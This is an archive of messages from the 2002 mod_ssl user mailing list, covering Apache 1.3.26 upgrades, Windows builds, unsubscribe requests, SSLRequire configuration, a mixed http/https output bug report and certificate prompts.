Subject: modssl for apache 2.0.39

Does anyone now when we can expect new modssl module for 2.0.39 or is 
there already one I can use?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:52:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA27975; Thu, 20 Jun 2002 21:51:39 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id VAA27883; Thu, 20 Jun 2002 21:50:33 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 12:50:26 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 19:50:26 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question
Date: Thu, 20 Jun 2002 19:50:26 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 19:50:26.0726 (UTC) FILETIME=[B9437460:01C21893]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Thanks a lot Tim.

Words cannot express the sense of relief and gratitude that i am feeling 
right now.

I would be eagerly looking tomorrow for the file :
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip
at the following location :
http://www.modssl.org/contrib/

Thanks a million again.

Bye,
-Jim.


Hi Jim

On Thu, 20 Jun 2002 17:48:38 +0000
"Jim Lee"  wrote:

Hi,

Please forgive my ignorance.

I wish to create a file similar to the following one:
Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,

namely,
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,

I need this file so that i can upgrade my current Apache 1.3.20 server
with mod_ssl to Apache 1.3.26 server with mod_ssl.

I do not have a VC++ 5.0 compiler on my desk and have no idea how i
could get the above file from the apache_1.3.26.tar.gz and the
mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.

I've got a VC++ 6.0 compiler at my desk and have already compiled the
stuff myself before on W32. I will do this tomorrow, however I will use
openssl 0.9.6d ....

I'll try to put it in the contrib area.

Bye
Tim



Any help from my friends would be highly appreciated.

Thanks.

Bye,
-Jim.



From: "Gilles Gros" 

What is really your question ?

Just download the source and compile it.

apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
mod SSL 2.8.9-1.3.26 :
http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

Gilles

Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
recently.

Thanks.

Bye,
-Jim.


On Wed, 19 Jun 2002, Jim Lee wrote:

We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in
the http://www.modssl.org/contrib/ area.

Nobody's contributed one yet.  I imagine it won't be that far off, it
usually doesn't take too long.

We also wish to know if the SSL certificate has to be re-created after
Apache is upgraded to 1.3.26 with the new mod_SSL.

No.

--Cliff

_________________________________________________________________
Join the world’s largest e-mail service with MSN Hotmail. 
http://www.hotmail.com

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:56:02 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA28304; Thu, 20 Jun 2002 21:54:50 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ncspsmtp2.ncs.com id VAA28236; Thu, 20 Jun 2002 21:54:02 +0200 (MET DST)
Received: from mnexbrg.eagan.ncs.com (not verified[159.182.96.5]) by ncspsmtp2.ncs.com with MailMarshal (4,2,5,0) 
	id ; Thu, 20 Jun 2002 14:49:36 -0500
Received: by mnexbrg.eagan.ncs.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Jun 2002 14:53:08 -0500
Message-ID: 
From: "Alvarez, Luis" 
To: modssl-users@modssl.org
Date: Thu, 20 Jun 2002 14:46:17 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alvarez, Luis" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Luis E. Alvarez
651.683.6311

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 21:56:14 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA28380; Thu, 20 Jun 2002 21:55:30 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from ncspsmtp2.ncs.com id VAA28274; Thu, 20 Jun 2002 21:54:24 +0200 (MET DST)
Received: from mnexbrg.eagan.ncs.com (not verified[159.182.96.5]) by ncspsmtp2.ncs.com with MailMarshal (4,2,5,0) 
	id ; Thu, 20 Jun 2002 14:49:59 -0500
Received: by mnexbrg.eagan.ncs.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Jun 2002 14:53:31 -0500
Message-ID: 
From: "Alvarez, Luis" 
To: modssl-users@modssl.org
Subject: how do I remove myself from the list?
Date: Thu, 20 Jun 2002 14:46:40 -0500
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Alvarez, Luis" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users



Luis E. Alvarez
651.683.6311

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:01:59 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id VAA28895; Thu, 20 Jun 2002 21:59:41 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.inorth.com id VAA28795; Thu, 20 Jun 2002 21:58:45 +0200 (MET DST)
Received: by mail.inorth.com with Internet Mail Service (5.5.2653.19)
	id ; Thu, 20 Jun 2002 15:57:56 -0400
Message-ID: 
From: Henning Sittler 
To: "'modssl-users@modssl.org'" 
Subject: RE: how do I remove myself from the list?
Date: Thu, 20 Jun 2002 15:58:31 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C21894.DA725E70"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Henning Sittler 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C21894.DA725E70
Content-Type: text/plain;
	charset="iso-8859-1"

http://www.modssl.org/support/


Henning Sittler
www.inscriber.com



-----Original Message-----
From: Alvarez, Luis [mailto:Luis_Alvarez@NCS.com]
Sent: Thursday, June 20, 2002 3:47 PM
To: modssl-users@modssl.org
Subject: how do I remove myself from the list?




Luis E. Alvarez
651.683.6311

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C21894.DA725E70
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: how do I remove myself from the list?




http://www.modssl.org/support/






Henning Sittler

www.inscriber.com








-----Original Message-----

From: Alvarez, Luis [mailto:Luis_Alvarez@NCS.com]

Sent: Thursday, June 20, 2002 3:47 PM

To: modssl-users@modssl.org

Subject: how do I remove myself from the =
list?










Luis E. Alvarez

651.683.6311




_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C21894.DA725E70--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:14:03 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00059; Thu, 20 Jun 2002 22:12:33 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id WAA00030; Thu, 20 Jun 2002 22:12:07 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Thu, 20 Jun 2002 13:12:00 -0700
Received: from 204.115.33.236 by lw7fd.law7.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 20:12:00 GMT
X-Originating-IP: [204.115.33.236]
From: "Jim Lee" 
To: modssl-users@modssl.org
Subject: Re: Apache 1.3.26 Upgrade Question - Thanks
Date: Thu, 20 Jun 2002 20:12:00 +0000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 20:12:00.0665 (UTC) FILETIME=[BC82E090:01C21896]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jim Lee" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Thanks a lot Tim.

Words cannot express the sense of relief and gratitude that i am feeling 
right now.

I would be eagerly looking tomorrow for the file :
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6d-WIN32.zip
at the following location :
http://www.modssl.org/contrib/

Thanks a million again.

Bye,
-Jim.


Hi Jim

On Thu, 20 Jun 2002 17:48:38 +0000
"Jim Lee"  wrote:

Hi,

Please forgive my ignorance.

I wish to create a file similar to the following one:
Apache_1.3.20-Mod_SSL_2.8.4-OpenSSL_0.9.6a-WIN32.zip,

namely,
Apache_1.3.26-Mod_SSL_2.8.9-OpenSSL_0.9.6c-WIN32.zip,

I need this file so that i can upgrade my current Apache 1.3.20 server
with mod_ssl to Apache 1.3.26 server with mod_ssl.

I do not have a VC++ 5.0 compiler on my desk and have no idea how i
could get the above file from the apache_1.3.26.tar.gz and the
mod_ssl-2.8.9-1.3.26.tar.gz and the openssl-0.9.6c.tar.gz files.

I've got a VC++ 6.0 compiler at my desk and have already compiled the
stuff myself before on W32. I will do this tomorrow, however I will use
openssl 0.9.6d ....

I'll try to put it in the contrib area.

Bye
Tim



Any help from my friends would be highly appreciated.

Thanks.

Bye,
-Jim.



From: "Gilles Gros" 

What is really your question ?

Just download the source and compile it.

apache 1.3.26 : http://www.apache.org/dist/httpd/apache_1.3.26.tar.gz
mod SSL 2.8.9-1.3.26 :
http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

Gilles

Hi,

Could somebody help me create the Apache_1.3.26-Mod_SSL_x-OpenSSL_x file
from the mod_ssl-2.8.9-1.3.26.tar.gz file that has been released
recently.

Thanks.

Bye,
-Jim.


On Wed, 19 Jun 2002, Jim Lee wrote:

We have been unable to find the above Apache_1.3.26-Mod_SSL_x file in
the http://www.modssl.org/contrib/ area.

Nobody's contributed one yet.  I imagine it won't be that far off, it
usually doesn't take too long.

We also wish to know if the SSL certificate has to be re-created after
Apache is upgraded to 1.3.26 with the new mod_SSL.

No.

--Cliff

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:17:55 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00238; Thu, 20 Jun 2002 22:13:52 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from copper.caltel.com id WAA00051; Thu, 20 Jun 2002 22:12:17 +0200 (MET DST)
Received: from lbn.got.net ([12.36.116.225]) by copper.caltel.com
          (Post.Office MTA v3.1.2 release (PO203-101c)
          ID# 0-68643U3500L350S0V35) with ESMTP id AAA28308
          for ; Thu, 20 Jun 2002 13:12:02 -0700
Message-Id: <5.1.1.6.0.20020620132435.048e50d0@mail.got.net>
X-Sender: lbaschy@mail.got.net
X-Mailer: QUALCOMM Windows Eudora Version 5.1.1
Date: Thu, 20 Jun 2002 13:31:58 -0700
To: modssl-users@modssl.org
From: Leo Baschy 
Subject: Re: how do I remove myself from the list?
In-Reply-To: 
Mime-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Leo Baschy 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

At 02:46 PM 6/20/02 -0500, you wrote:
>Luis E. Alvarez
>651.683.6311

You could set your anti-spam filter to not let anything through that is coming from this list.

Just thought I give an answer that matches the question ;)

I hope another time I'll have something smarter to contribute.

- Leo Baschy

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:18:00 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00415; Thu, 20 Jun 2002 22:15:25 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00200; Thu, 20 Jun 2002 22:13:36 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 770634CE7A8; Thu, 20 Jun 2002 22:13:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 25AF228840; Thu, 20 Jun 2002 19:34:46 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id KAA03921; Thu, 20 Jun 2002 10:25:13 +0200 (MET DST)
Date: Thu, 20 Jun 2002 10:25:13 +0200 (MET DST)
Message-Id: <200206200825.KAA03921@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: Re: [BugDB] PRIVATE: apache 1.3.26 (PR#720)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

On Wed, Jun 19, 2002 at 01:38:07AM +0200, modssl-bugdb@modssl.org wrote:
> Full_Name: Michael Duncan
> Version: 2.8.8
> OS: RedHat 7.2
> Submission from: (NULL) (216.224.74.74)
> 
> 
> I was trying to apply the latest apache 1.3.26 to my server and the mod_ssl is
> not allowing the install.  Is there any time line on when mod_ssl will support
> 1.3.26?
> 
It is available from http://www.modssl.org/source/mod_ssl-2.8.9-1.3.26.tar.gz

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:18:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00459; Thu, 20 Jun 2002 22:15:44 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00192; Thu, 20 Jun 2002 22:13:33 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 588D04CE7A4; Thu, 20 Jun 2002 22:13:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id B5C1A286BB; Thu, 20 Jun 2002 19:34:02 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hotmail.com id EAA05710; Thu, 20 Jun 2002 04:45:39 +0200 (MET DST)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 19 Jun 2002 18:28:26 -0700
Received: from 141.190.250.5 by lw8fd.law8.hotmail.msn.com with HTTP;
	Thu, 20 Jun 2002 01:28:26 GMT
X-Originating-IP: [141.190.250.5]
From: "Jess Williams" 
To: modssl-users@modssl.org
Subject: SSL for apache 2.0.39
Date: Wed, 19 Jun 2002 15:28:26 -1000
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 20 Jun 2002 01:28:26.0635 (UTC) FILETIME=[C69E3DB0:01C217F9]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jess Williams" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

I downloaded the binary for RedHat for 2.0.39 and installed it on RedHat 
7.1.  For some reason apache will not start listening on 443!  Its driving 
me crazy.  It works fine for port 80 just not 443.

Do I need to download something in addition?  I am trying to use
./apachectl startssl to start it up

Jess

_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:18:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00506; Thu, 20 Jun 2002 22:16:14 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00212; Thu, 20 Jun 2002 22:13:38 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id CDB944CE7B1; Thu, 20 Jun 2002 22:13:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id C2FA3286BB; Thu, 20 Jun 2002 19:35:37 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from calypso.urec.cnrs.fr id RAA07548; Thu, 20 Jun 2002 17:43:24 +0200 (MET DST)
Received: from urec.cnrs.fr (pan.paris.urec.cnrs.fr [194.57.137.45])
          by calypso.urec.cnrs.fr (8.9.3/jtpda-5.3.1) with ESMTP id RAA07597
          for ; Thu, 20 Jun 2002 17:43:19 +0200
Message-ID: <3D11F815.4056FBC1@urec.cnrs.fr>
Date: Thu, 20 Jun 2002 17:43:18 +0200
From: Xavier Jeannin 
Organization: CNRS/UREC
X-Mailer: Mozilla 4.79 [en] (Windows NT 5.0; U)
X-Accept-Language: en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: to much asking my certificate
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Xavier Jeannin 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello

My apache with ModSSL (mod_ssl-2.8.5-1.3.22) work fine but it asks me at
every page (sometime 2 times) my certificate.
I have increase SSLsessionCache but it does no effect
Anybody got an idea ?
thank you in advance
-xj

--
________________________________________________________________________________________

Xavier Jeannin   UREC/CNRS
Université P. & M. Curie - Tour 65/66 - 4ième étage
Courrier : case 171
4, place Jussieu - 75252 PARIS CEDEX 05
Tél : 01 44 27 42 59 - Fax : 01 44 27 42 61
Xavier.Jeannin@urec.cnrs.fr
_________________________________________________________________________________________


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:18:42 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00541; Thu, 20 Jun 2002 22:16:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00190; Thu, 20 Jun 2002 22:13:34 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 4ACDA4CE7A1; Thu, 20 Jun 2002 22:13:28 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 3C2B628847; Thu, 20 Jun 2002 19:34:55 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pascal.arago.de id NAA18276; Thu, 20 Jun 2002 13:18:37 +0200 (MET DST)
Received: Received: (from uucp@localhost)
	by pascal.arago.de id g5KBIaj12698949
	for modssl-users@modssl.org; Thu, 20 Jun 2002 13:18:36 +0200 (METDST)
Received: from UNKNOWN(194.153.130.2), claiming to be "carat.arago.de"
 via SMTP by pascal.arago.de, id smtpdAAAa0nXBV; Thu Jun 20 13:18:35 2002
Received: from ohm.arago.de (localhost [127.0.0.1])
	by carat.arago.de (8.9.3/8.9.3) with SMTP id NAA28265
	for ; Thu, 20 Jun 2002 13:17:44 +0200 (MET DST)
Received: (from gryf@localhost)
	by ohm.arago.de (SGI-8.9.3/8.9.3) id NAA78741
	for modssl-users@modssl.org; Thu, 20 Jun 2002 13:18:31 +0200 (METDST)
Date: Thu, 20 Jun 2002 13:18:31 +0200
From: Thomas Binder 
To: modssl-users@modssl.org
Subject: Re: SSLRequire use to enforce SSL for "almost all" files
Message-ID: <20020620131831.A411815@ohm.arago.de>
Mail-Followup-To: modssl-users@modssl.org
References: <3D0F3FDB.3000706@filanet.dk>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
User-Agent: Mutt/1.2.5i
In-Reply-To: <3D0F3FDB.3000706@filanet.dk>; from lp@filanet.dk on Tue, Jun 18, 2002 at 04:12:43PM +0200
Organization: arago GmbH
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Thomas Binder 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi!

On Tue, Jun 18, 2002 at 04:12:43PM +0200, Lars Povlsen wrote:
> I tried putting the following in a .htaccess file:
> 
> SSLRequire %{SCRIPT_FILENAME} !~ m/(signon|get_swimg|get_disksw)\.php$/
> 
> It did *not* work as intended..., I could still use non-ssl access to 
> arbitrary scripts

That may be because SCRIPT_FILENAME is not in the list of
variables supported by SSLRequire (see
http://www.modssl.org/docs/2.8/ssl_reference.html#table3)

Have you tried using REQUEST_URI instead?


Ciao

Thomas
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:19:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00582; Thu, 20 Jun 2002 22:17:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00182; Thu, 20 Jun 2002 22:13:31 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id DBBEB4CE793; Thu, 20 Jun 2002 22:13:27 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 178F4286C5; Thu, 20 Jun 2002 19:33:11 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from localhost id SAA16816; Wed, 19 Jun 2002 18:21:23 +0200 (MET DST)
Date: Wed, 19 Jun 2002 18:21:23 +0200 (MET DST)
Message-Id: <200206191621.SAA16816@opensource.ee.ethz.ch>
From: modssl-bugdb@modssl.org
To: modssl-users@modssl.org
Subject: [BugDB] Broken stdout when using https and http (PR#721)
Cc: modssl-bugdb@modssl.org
X-Loop: modssl-bugdb@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl-bugdb@modssl.org
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Full_Name: Alex Barylo
Version: 2.8.8-1.3.24
OS: Red Hat 6.2
Submission from: (NULL) (170.115.249.14)


PROBLEM
=======
Sorry for a lot of details, thought you might need them.

I have a small FTP site writen in Perl using Apache::Registry. The site is one
script that gets invoked all over again. First page is a login form. It POST's
user name and password via https://. After successfull authentication the script
spits out a frame set with two frames. Frame pull their pages through http://.
The problem described below occures only when I use both https and http. If I
use only http, or only https - everything works fine.

When it appears, most of the time extra characters are added after new-line char
("\n"). If it's a big listing, often there is a pattern. This is a regular
output line:

  00397.par_1401.pgp
              15.15 Kb      Feb 27 2001 17:44

followed by 0xa. Its length is 208 bytes (excluding '\n'). After 19 lines I get
this (1): "0x0a 0x0d 0x0a 0x64 0x31 0x0d 0x0a", then one line, then this (2):
"0x0a 0x0d 0x0a 0x66 0x38 0x33 0x0d 0x0a". Then another block of 19 lines,
followed by sequence (1), then one line, followed by sequence (2), etc. These
sequences may or may not remain the same for the subsequent requests. Looks like
junk from memory.

Sometimes I get this:

  00397.par_1502.pgp
              31.98 Kb      Feb 27 2001 17:44

or this:

  00397.par_1085.pgp
               2.00Kb      Feb 27 2001 17:38

If anybody interested, I have dumps what was sent by server, I can make new
ones, I can run tests, try this or that, etc.


CONFIG
======
apache_1.3.24
mm-1.1.3 (tried without this library - same result)
perl 5.6.1
mod_perl-1.27
mod_ssl-2.8.8-1.3.24
openssl-0.96d
OS: Red Hat 6.2
kernel: 2.2.18
gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release)
glibc-2.1.2-11

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Jun 20 22:19:34 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id WAA00644; Thu, 20 Jun 2002 22:17:37 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id WAA00171; Thu, 20 Jun 2002 22:13:29 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 9C5724CE691; Thu, 20 Jun 2002 22:13:27 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4E6CC28839; Thu, 20 Jun 2002 19:32:51 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mystic1.trustcenter.de id QAA07492; Wed, 19 Jun 2002 16:06:13 +0200 (MET DST)
Received: (from root@localhost)
	by mystic1.trustcenter.de (8.10.2+Sun/8.10.2) id g5JE5gg00183
	for ; Wed, 19 Jun 2002 16:05:42 +0200 (MEST)
Received: from venus.trustcenter.de(192.168.200.233) by mystic1.trustcenter.de via csmap (V6.0)
	id srcAAA08aOwa; Wed, 19 Jun 02 16:05:42 +0200
Received: from trustcenter.de (titan.trustcenter.de [192.168.200.244])
	by venus.trustcenter.de (8.11.0/8.11.0) with ESMTP id g5JE65Q03303;
	Wed, 19 Jun 2002 16:06:06 +0200 (MET DST)
Message-ID: <3D108FCD.3080304@trustcenter.de>
Date: Wed, 19 Jun 2002 16:06:05 +0200
From: =?ISO-8859-15?Q?G=F6tz_Babin-Ebell?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.0.0) Gecko/20020529
X-Accept-Language: de, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: loading own Object IDs
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms070006080701010606090704"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-15?Q?G=F6tz_Babin-Ebell?= 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms070006080701010606090704
Content-Type: text/plain; charset=ISO-8859-15; format=flowed
Content-Transfer-Encoding: 7bit

Hello,


In OpenSSL you can load own object identifiers.

Is there a way to load them with mod_ssl ?

for example:

I want the OID 2.5.4.17 (id-at-postalCode) to be known
(and printed) as  PC.

Bye

Goetz

-- 
Goetz Babin-Ebell, TC TrustCenter AG, http://www.trustcenter.de
Sonninstr. 24-28, 20097 Hamburg, Germany
Tel.: +49-(0)40 80 80 26 -0,  Fax: +49-(0)40 80 80 26 -126

--------------ms070006080701010606090704
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature
Content-Transfer-Encoding: base64

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIHijCC
A8EwggMqoAMCAQICDwDsvQAAAAIG79fNDTdLEjANBgkqhkiG9w0BAQUFADCBvDELMAkGA1UE
